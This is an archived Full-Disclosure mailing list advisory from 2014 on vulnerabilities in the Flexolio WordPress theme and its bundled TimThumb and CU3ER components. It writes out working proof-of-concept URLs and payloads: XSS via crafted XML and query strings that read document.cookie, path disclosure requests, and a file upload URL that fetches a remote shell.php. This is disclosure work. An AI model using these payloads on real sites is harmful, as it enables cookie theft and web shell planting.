| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 4 May 2014 21:10:11 +0300 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <fulldisclosure@...lists.org> Subject: [FD] Multiple vulnerabilities in Flexolio for WordPress Hello list! There are Content Spoofing, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities in Flexolio for WordPress. Which contains TimThumb and CU3ER. In April 2011 I wrote about vulnerabilities in TimThumb (http://seclists.org/fulldisclosure/2011/Apr/227) and in April 2014 I wrote about vulnerabilities in CU3ER (http://seclists.org/fulldisclosure/2014/Apr/244). ------------------------- Affected products: ------------------------- Vulnerable are all versions of Flexolio. ------------------------- Affected vendors: ------------------------- Quarterpixel http://quarterpixel.de ---------- Details: ---------- Content Spoofing (Content Injection) (WASC-12): http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/1.xml File 1.xml: <?xml version="1.0" encoding="UTF-8"?> <cu3er> <slides> <slide> <url>1.jpg</url> <link>http://websecurity.com.ua</link> </slide> </slides> </cu3er> Cross-Site Scripting (WASC-08): http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2 File xss.xml: <?xml version="1.0" encoding="UTF-8"?> <cu3er> <slides> <slide> <url>1.jpg</url> <link>javascript:alert(document.cookie)</link> </slide> </slides> </cu3er> For cross-domain attacks it's needed to have crossdomain.xml at web site with xml-files. Cross-Site Scripting (WASC-08): http://site/wp-content/themes/flexolio/inc/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://site/wp-content/themes/flexolio/inc/thumb.php?src=http:// And also Abuse of Functionality and DoS in vulnerabilities in TimThumb (http://seclists.org/fulldisclosure/2011/Apr/227) and Arbitrary File Upload vulnerability, which was disclosed after 3,5 months after my disclosure of previous holes. They are possible in old versions of the theme, because in the last versions of the theme in TimThumb the access to remote sites is forbidden. Arbitrary File Upload (WASC-31): http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://site.com/shell.php Full path disclosure (WASC-13): FPD in php-files of the theme (by default) or in error_log. In index.php and other php-files. http://site/wp-content/themes/webfolio/ ------------ Timeline: ------------ 2013.11.22 - announced at my site about CU3ER. 2013.11.26 - informed developer. 2013.11.26 - announced at my site about plugins and later about themes. Later informed developers of the plugins and themes. 2014.04.26 - disclosed at my site about Flexolio for WordPress (http://websecurity.com.ua/7141/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists